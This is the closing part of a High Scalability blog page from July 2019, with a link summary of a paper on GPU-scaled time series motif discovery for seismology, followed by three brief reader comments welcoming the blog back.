<li><a href="https://www.cs.ucr.edu/~eamonn/public/GPU_Matrix_profile_VLDB_30DraftOnly.pdf">Scaling Time Series Motif Discovery with GPUs: Breaking the Quintillion Pairwise Comparisons a Day Barrier</a>: In this work we show that with several novel insights we can push the motif discovery envelope using a novel scalable framework in conjunction with a deployment to commercial GPU clusters in the cloud. We demonstrate the utility of our ideas with detailed case studies in seismology, demonstrating that the efficiency of our algorithm allows us to exhaustively consider datasets that are currently only approximately searchable, allowing us to find subtle precursor earthquakes that had previously escaped attention, and other novel seismic regularities.</li>
</ul>

        
  
          
  
         
  
      </div>

    

  </div>

      <div class="journal-entry-tag journal-entry-tag-post-body">
      <div class="journal-entry-tag-post-body-line1"><span class="posted-by">  <a href="/blog/author/highscalability"> <img title="Author" alt="Author" class="inline-icon user-registered-icon" rel="smalllight" src="/universal/images/transparent.png" />Todd Hoff</a></span> |  <span class="post-comments"><a href="/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html#comments"> <img title="Comment" alt="Comment" class="inline-icon comment-icon" rel="smalllight" src="/universal/images/transparent.png" />3 Comments</a></span> |  <span class="permalink-item"><a class="permalink" href="/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html"> <img title="Permalink" alt="Permalink" class="inline-icon permalink-icon" rel="smalllight" src="/universal/images/transparent.png" />Permalink </a></span> |  <span class="share-item"><a href="javascript:noop();" onclick="Squarespace.Interaction.shareLink(this,'%2Fblog%2F2019%2F7%2F19%2Fstuff-the-internet-says-on-scalability-for-july-19th-2019.html','Stuff%20The%20Internet%20Says%20On%20Scalability%20For%20July%2019th%2C%202019');"> <img title="Share Article" alt="Share Article" class="inline-icon share-icon" rel="smalllight" src="/universal/images/transparent.png" />Share Article </a></span> <span class="print-item"><a href="/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html?printerFriendly=true"> <img title="Print Article" alt="Print Article" class="inline-icon print-icon" rel="smalllight" src="/universal/images/transparent.png" />Print Article </a></span> <span class="email-item"><a href="/blog/recommend/36202663"> <img title="Email Article" alt="Email Article" class="inline-icon email-icon" rel="smalllight" src="/universal/images/transparent.png" />Email Article </a></span> </div>
      <div class="journal-entry-tag-post-body-line2"><span class="posted-in">in <span class="tag-element"><a rel="tag" href="/blog/category/hot-links"> <img title="Category" alt="Category" class="inline-icon category-icon" rel="smalllight" src="/universal/images/transparent.png" />hot links</a></span></span>  <span class="post-snippet-1"><iframe src="//www.facebook.com/plugins/like.php?href=http://highscalability.com/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html&layout=standard&show_faces=true&width=450&action=like&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe></span> <span class="post-snippet-2"><a href="//twitter.com/share" class="twitter-share-button" data-url="http://highscalability.com/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html" data-text="Stuff The Internet Says On Scalability For July 19th,&nbsp;2019" data-count="horizontal">Tweet</a><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="//platform.twitter.com/widgets.js"></script></span> </div>
      <div class="journal-entry-tag-post-body-line3"></div>
    </div>
  
  
  <div class="clearer"></div>

</div>
</div>





  </div>

  

  

  

  

  
    <div class="journal-comment-area-wrapper">
    <div id="comments" class="journal-comment-area">

      <h3 class="caption">Reader Comments  (3) </h3>

      
        
  <div class="comment-wrapper authored-by-None">
  <div class="comment" id="comment21924792">

    <div id="item21924792" class="body">

      <p>Welcome back!</p>

    </div>
    <div class="signature">

      July 19, 2019 | 
  <a href="/contributor/30889895" title="Unregistered Commenter">
  <img title="Unregistered Commenter" alt="Unregistered Commenter" class="inline-icon" rel="smalllight" src="/universal/images/transparent.png" style="background:transparent url(/universal/images/core-resources/icons/smalllight/user-unregistered.png) top left no-repeat;"/>Joel Williams
  
  </a>



      
        

        

      

    </div>

  </div>
  </div>


  <div class="comment-wrapper authored-by-None">
  <div class="comment" id="comment21924860">

    <div id="item21924860" class="body">

      <p>Wow! You have no idea how much I missed this blog.</p>

    </div>
    <div class="signature">

      July 19, 2019 | 
  <a href="/contributor/30890094" title="Unregistered Commenter">
  <img title="Unregistered Commenter" alt="Unregistered Commenter" class="inline-icon" rel="smalllight" src="/universal/images/transparent.png" style="background:transparent url(/universal/images/core-resources/icons/smalllight/user-unregistered.png) top left no-repeat;"/>Coco
  
  </a>



      
        

        

      

    </div>

  </div>
  </div>


  <div class="comment-wrapper authored-by-None">
  <div class="comment" id="comment21924975">

    <div id="item21924975" class="body">

      <p>Wow, that&#39;s a yuuuggee post. Thank you! Will make the weekend busy!</p>

    </div>
    <div class="signature">

      July 20, 2019 | 
  <a href="/contributor/30890492" title="Unregistered Commenter">
  <img title="Unregistered Commenter" alt="Unregistered Commenter" class="inline-icon" rel="smalllight" src="/universal/images/transparent.png" style="background:transparent url(/universal/images/core-resources/icons/smalllight/user-unregistered.png) top left no-repeat;"/>Fan
  
  </a>



      
        

        

      

    </div>

  </div>
  </div>



        

      

    </div>
    </div>

    
      <div class="journal-add-comment-area-wrapper">
  
          
            
            
  <script type="text/javascript">
  // <![CDATA[

    var isAddCommentsVisible = true;

    function toggleReferenceMode() {
      if (isAddCommentsVisible) {
        hideObject(document.getElementById("add-comment-area"));
        showObject(document.getElementById("add-reference-area"));
      } else {
        showObject(document.getElementById("add-comment-area"));
        hideObject(document.getElementById("add-reference-area"));
      }
      isAddCommentsVisible = !isAddCommentsVisible;
    }

    E.addListener("postform", "keydown", Squarespace.SessionAuthorizationKey.acquireAuthKey, '');

  // ]]>
  </script>

  <form method="post" style="margin: 0; padding: 0;" name="postform" id="postform" action="/process/CreateJournalEntryComment?moduleId=4867632&amp;entryId=36202663"> 

     <input type="hidden" name="currentPage" value="1"/> 
 
    <div class="notice-box" style="margin-top: 2em;" id="add-comment-area">

      
                              <h3 class="caption"><img title="Post" alt="Post" class="inline-icon" rel="smalllight" src="/universal/images/transparent.png" style="background:transparent url(/universal/images/core-resources/icons/smalllight/comment.png) top left no-repeat;"/>Post a New Comment</h3>
          
        

        <div class="caption-text">

          Enter your information below to add a new comment.

          

        </div>

        

        <script type="text/javascript" src="/universal/scripts/storable-fields.js?CE=75"></script>

        
          <div class="input-field">
            
            <div id="authorName_title" class="title">
               Author: 

              &nbsp;<a id="storedFieldControls" style="display: none; font-size: 9px;" href="javascript:forgetSavedFields();">(forget stored information)</a>
            </div>
            <input class="text" type="text" style="width: 200px;" name="authorName" id="authorName" value="" maxlength="50" tabindex="2"/>
          </div>

          <div class="input-field">
            
            <div id="authorEmail_title" class="title"> Author Email (optional): 
</div>
            <input class="text" type="text" style="width: 200px;" name="authorEmail" id="authorEmail" value="" maxlength="255" tabindex="3"/>
          </div>

          <div class="input-field">
            
            <div id="authorUrl_title" class="title"> Author URL (optional): 
</div>
            <input class="text" type="text" style="width: 200px;" name="authorUrl" id="authorUrl" value="" maxlength="255" tabindex="4"/>
          </div>

          <script type="text/javascript">

            YAHOO.util.Event.addListener(window, "load", function() {

              document.getElementById("storedFieldControls").style.display = (Squarespace.StorableFields.isDataSaved("authorName", "authorEmail", "authorUrl") ? "inline" : "none");
              Squarespace.StorableFields.recall("authorName", "authorEmail", "authorUrl");

            });

            function forgetSavedFields() {

              Squarespace.StorableFields.forget("authorName", "authorEmail", "authorUrl");
              document.getElementById("storedFieldControls").style.display = "none";

            }

          </script>

        

        <script type="text/javascript">
          function expandBody() { b = document.getElementById("body"); b.style.height = (b.offsetHeight + 40) + "px"; }
          function shrinkBody() { b = document.getElementById("body"); b.style.height = (b.offsetHeight - 40) + "px"; }
        </script>

        
        <div id="body_title" style="padding-bottom: 5px; float: left;"> Post: 
</div>
        <div style="padding-bottom: 5px; float: right;"><a title="Increase the size of the comment area." href="javascript:expandBody();">&#8595;</a> | <a title="Decrease the size of the comment area." href="javascript:shrinkBody();">&#8593;</a></div>
        <div class="clearer">&nbsp;</div>
        <div style="padding-bottom: 5px;"><textarea rows="15" cols="60" name="body" id="body" tabindex="5"></textarea></div>
        <div style="padding-bottom: 5px;">Some HTML allowed: &lt;a href=&quot;&quot; title=&quot;&quot;&gt; &lt;abbr title=&quot;&quot;&gt; &lt;acronym title=&quot;&quot;&gt; &lt;b&gt; &lt;blockquote cite=&quot;&quot;&gt; &lt;code&gt; &lt;em&gt; &lt;i&gt; &lt;strike&gt; &lt;strong&gt;</div>

        

        

        <div class="footer">

                      <div class="notice-box-alert">
              <div class="icon"><img title="Alert" alt="Alert" class="inline-icon" rel="smalllight" src="/universal/images/transparent.png" style="background:transparent url(/universal/images/core-resources/icons/smalllight/alert.png) top left no-repeat;"/></div>
              <div class="text">
                <strong>Comment Moderation Enabled</strong><br/>
                Your comment will not appear until it has been cleared by a website editor.
              </div>
            </div>
          

                    
            <p style="padding-bottom: 10px;"><input class="checkbox" type="checkbox" name="followOptIn" id="followOptIn" value="true"  tabindex="6"/>
              <span onclick="toggleNotify()" style="cursor: pointer; cursor: hand">Notify me of follow-up comments via email.</span>
            </p>
            <br/>

          

          <input type="hidden" id="authKey" name="authKey" value=""/>
          <input style="width: 150px;" tabindex="6" class="button" type="button" name="createPostButton"  id="createPostButton"  value="Create Post"  onclick="submitContent(true);"/> &nbsp;&nbsp;
          <input style="width: 150px;" tabindex="7" class="button" type="button" name="previewPostButton" id="previewPostButton" value="Preview Post" onclick="submitContent(false);"/>

        </div>

      

    </div>

  </form>

  <script type="text/javascript">
  // <![CDATA[

    function toggleNotify() {
      document.getElementById("followOptIn").click();
    }
              
    function submitContent(isFinal) {
      if (isFinal) {
        document.getElementById("postform").action += "&finalize=true";
        Squarespace.StorableFields.save("authorName", "authorEmail", "authorUrl");
      }
      Squarespace.Form.smartSubmit("postform");
    }

  // ]]>
  </script>

  


  
            
  
          
  
        
  
      </div>
        
    
  
  
  

  


  

  

  
  

</div></div> <!-- Content -->
  
    
  
    </div></div> <!-- Page Body -->

    
    
    <div id="pageFooterWrapper"><div id="pageFooter">
  
              Copyright &copy; 2018, Todd Hoff.  All rights reserved.
      
  
      
  
    </div></div>
  
  </div></div> <!-- Canvas -->
  
   


  <div class="clearer" id="bodyClearer"></div>

  



</body>
</html>